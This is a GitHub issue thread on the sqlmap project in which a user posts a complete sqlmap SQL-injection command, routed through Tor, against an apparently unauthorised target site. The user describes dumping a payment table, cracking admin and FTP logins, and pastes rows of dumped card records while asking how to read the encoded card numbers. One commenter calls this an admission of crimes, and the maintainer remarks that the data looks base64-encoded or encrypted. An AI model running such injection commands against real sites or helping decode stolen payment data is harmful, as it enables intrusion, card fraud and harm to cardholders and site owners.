### ISSUE TITLE
neeed help in sql database using sqlmap

### ISSUE THREAD

**Issue by mamozz** [sqlmapproject/sqlmap#5234]
sqlmap.py --random-agent --tor-type=SOCKS5 -u http://www.target.net/browse.cfm?dept=1' -D datbasename -T receipt_payment --where "ID=6000" --dump  --level 5 --risk 3 --tamper=space2comment --threads=10

i just dump one of table thats table for orders with all info of credit card 

it shown like thats
id,paymentid,receipt_id,transactionid,dts,cvv2,alias,ccnumber,checknum,avsresponse,paymentname,prepay_flag,approval_code,creditcardtype,expirationyear,giftcardnumber,payment_amount,expirationmonth,cardcoderesponse
6000,0,RC00004000032229,000000015970,2020-12-30 04:57:13,0,6gpgshD5EF,0,0,3,CREDIT CARD,0,015707,VISA,25,0,56.00,7,1

not know why  my --current-user is current user: 'root@localhost' 
and i crack admin panel user and pass and login 
and also crack user and pass of ftp and login but i not know why cc shown as thats 
Can u help me please

**Comment by mamozz** [comment]
no answer :(

**Comment by mamozz** [comment]
id,paymentid,receipt_id,transactionid,dts,cvv2,alias,ccnumber,checknum,avsresponse,paymentname,prepay_flag,approval_code,creditcardtype,expirationyear,giftcardnumber,payment_amount,expirationmonth,cardcoderesponse
1,0,RC00004000026195,000000000051,2012-02-03 08:55:04,NULL,pNaE55zNob,rssNMaQSn2k1xBC1tRO0sxiWtKGapI17ZWypOzEd6whXI2ijiSu2q1pX+ThcYHMVr3TvQoMK,NULL,Y,CREDIT CARD,0,050102,Visa,NULL,NULL,59.96,NULL,M


thats example to show how look like when i dump it :( not know whats wrong it even i have administartor privilage .....can get any help

**Comment by byaura** [comment]
If the system is not yours, you are basically admiting that you commited multiple crimes.
Close this thread

**Comment by stamparm** [comment]
well, something is encoding the data. seems to me like some base64 is used on binary data (could be that the original data is actually encrypted)
